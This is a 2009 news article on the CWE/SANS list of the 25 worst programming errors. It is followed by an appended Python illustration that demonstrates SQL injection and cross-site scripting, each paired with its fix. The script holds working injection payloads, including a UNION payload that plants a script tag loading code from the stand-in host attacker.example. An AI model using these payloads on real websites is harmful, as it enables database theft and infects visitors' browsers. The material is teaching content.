List of worst 25 programming errors ever released

Published 14 January 2009

Leading cyber security organizations release a list of the worst 25 programming errors ever; it is a scary list

Leading organizations involved in software and software security — among them Microsoft, the NSA, the SANS Institute, and Mitre — have joined to issue a list of the top 25 most dangerous programming errors ever. Slip-ups on the part of software coders can result in costly thefts by hackers. The remedy: better education and more accountability.

Walaika Haskins writes in TechNewsWorld that a report issued Monday details the 25 most dangerous programming errors committed by software writers that result in security bugs and enable cyber espionage and cybercrime. The list was compiled by more than thirty experts from cyber security organizations in the U.S. and other countries. Experts from the Computer Emergency Response Team (CERT), the non-profit technology resource Mitre, the National Security Agency, and DHS’s National Cyber Security Division, Symantec, Microsoft, and the Japanese IPA, among others, named the errors, according to Mason Brown, director of the SANS Institute, which helped coordinate the project.

Haskins writes that just two of the errors alone led to more than 1.5 million Web site security breaches in 2008. These breaches, in turn, compromised the computers of people visiting those sites, turning the computers into so-called zombie machines, the report states. “[The mistakes] are huge. They are the underlying reason for almost all the patches we end up having to install on computers all over the world, and they enable the vast bulk of cybercrime and cyber espionage,” Alan Paller, director of research at the SANS Institute, told TechNewsWorld. “In one case in 2008, more than 1 million Web sites were penetrated and infected and made to infect their visitors’ computers — and those were trusted sites like the United Nations, state government and others. That was caused by errors 1 and 2 on the list,” he continued.

Topping the list are errors dubbed “Insecure Interaction Between Components.” The nine programming mistakes under this heading include: improper input validation, improper encoding or escaping of output, failure to preserve SQL query structure (a.k.a. SQL injection), and failure to preserve Web page structure (a.k.a. cross-site scripting). “Some of the consequences can be very significant. For example, the ‘CWE-89: Failure to Preserve SQL Query Structure (a.k.a. SQL Injection)’ is a flaw that has been used to inject malicious code into many thousands of Web sites. The technique has been known for many years but was used extensively by hackers in 2008 to spread malicious software and spyware
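As an added illustration, not part of the original article or of the CWE/SANS report, the following Python script shows what “failure to preserve SQL query structure” means in practice, and how content injected that way becomes the “failure to preserve Web page structure” flaw (cross-site scripting) when it is copied into a page unescaped. The articles table, its rows and the attacker host attacker.example are constructed for this example; the parameterized query and output escaping are the standard fixes, not anything the report prescribes verbatim.

```python
import html
import sqlite3


def make_db():
    """Constructed sample data: a tiny 'articles' table standing in for a
    site's content database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "Hello, world"), ("Budget report", "Figures for FY2008")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, title):
    """CWE-89: the untrusted value is spliced into the SQL text, so a quote
    in the input ends the string literal and the rest is parsed as SQL.
    The structure of the query is decided by the attacker, not the developer."""
    sql = "SELECT id, title, body FROM articles WHERE title = '" + title + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, title):
    """The query structure is fixed before the value is bound; the input can
    only ever be compared as data, whatever characters it contains."""
    sql = "SELECT id, title, body FROM articles WHERE title = ?"
    return conn.execute(sql, (title,)).fetchall()


def render_vulnerable(rows):
    """CWE-79: database content is copied into the page unescaped, so a
    <script> tag that reached the database runs in every visitor's browser."""
    return "".join(f"<h2>{t}</h2><p>{b}</p>" for _, t, b in rows)


def render_fixed(rows):
    """Escaping on output preserves the page structure: the same bytes are
    displayed as text instead of being parsed as markup."""
    return "".join(f"<h2>{html.escape(t)}</h2><p>{html.escape(b)}</p>" for _, t, b in rows)


# Constructed attacker inputs; the host attacker.example is fictitious.
# The tautology turns a single-row lookup into a dump of the whole table.
BYPASS_PAYLOAD = "' OR '1'='1"
# The UNION appends an attacker-chosen row; the trailing "-- " comments out
# the closing quote the developer's code adds.
UNION_PAYLOAD = (
    "x' UNION SELECT 0, 'pwned', "
    "'<script src=\"http://attacker.example/m.js\"></script>' -- "
)


def demo():
    conn = make_db()
    all_rows = lookup_vulnerable(conn, BYPASS_PAYLOAD)     # every row
    none = lookup_fixed(conn, BYPASS_PAYLOAD)              # no title matches
    injected = lookup_vulnerable(conn, UNION_PAYLOAD)      # attacker's row
    return {
        "vulnerable_bypass_rows": len(all_rows),
        "fixed_bypass_rows": len(none),
        "vulnerable_union_rows": len(injected),
        "fixed_union_rows": len(lookup_fixed(conn, UNION_PAYLOAD)),
        "unescaped_page": render_vulnerable(injected),
        "escaped_page": render_fixed(injected),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the script shows the concatenated query returning both rows for the tautology and the attacker's script tag for the UNION payload, while the parameterized query returns nothing for either; the escaped renderer emits the injected tag as visible text (`&lt;script ...`) rather than live markup. In the 2008 mass compromises the report refers to, the injected content was written into the database with UPDATE statements and served to every visitor, which is why the two errors are described together.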